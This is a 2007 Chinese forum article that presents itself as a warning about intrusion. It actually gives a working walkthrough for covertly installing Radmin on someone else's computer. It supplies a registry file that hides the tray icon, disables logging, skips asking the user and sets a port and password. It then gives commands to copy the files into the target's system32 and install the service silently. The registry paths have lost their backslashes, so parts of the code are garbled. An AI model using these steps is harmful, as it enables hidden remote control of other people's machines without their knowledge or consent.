小心系统入侵之八招吸星大法！(1)

2007-01-12 13:27:38 论坛 　 【大 中 小】 发表评论

　　我们平常所用的远程共用一个桌面的服务软件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感觉已经被淘汰了， 它的缺点太多，例如要依赖IPC＄，日志记录等等。Pcanywhere 我没有研究过。VNC 最大的特点是跨平台，但缺点是隐藏图标的问题，我不会编程，当然无法去除图标，还有就是 VNC 功能很少。radmin 就不同了，它的特色有：速度快隐藏图标，COPY文件，telnet 等功能。安装也及其简单：
　　首先要在自己修改注册表............

　　HKEY_LOCAL_MACHINESYSTEMRAdmin 起名为radmin.reg 　

　　内容大概如下：

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHINESYSTEMRAdmin]

　　[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0]

　　[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Server]

　　[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0Serveriplist]

　　[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]

　　"Port"=hex:64,19,00,00

　　"Timeout"=hex:0a,00,00,00

　　"EnableLogFile"=hex:00,00,00,00

　　"LogFilePath"="c:logfile.txt"

　　"FilterIp"=hex:00,00,00,00

　　"DisableTrayIcon"=hex:01,00,00,00

　　"AutoAllow"=hex:00,00,00,00

　　"AskUser"=hex:00,00,00,00

　　"EnableEventLog"=hex:00,00,00,00

　　"NTAuthEnabled"=hex:00,00,00,00

　　"Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b

　　解释一下 "DisableTrayIcon"=hex:01,00,00,00 里的01表示隐藏图标，改成00，图标就会显示 。"Port"=hex:当然是端口，这里是6500。 "Parameter"=hex:是密码。

　　其他的就不用管了。

　　现在我们将

　　AdmDll.dll

　　raddrv.dll

　　r_server.exe

　　radmin.reg

　　复制到对方的c:winntsystem32下。

　　然后在对方机器上运行：

　　regedit /s radmin.reg

　　r_server /install /silence

　　net start r_server

更多"系统" 的相关消息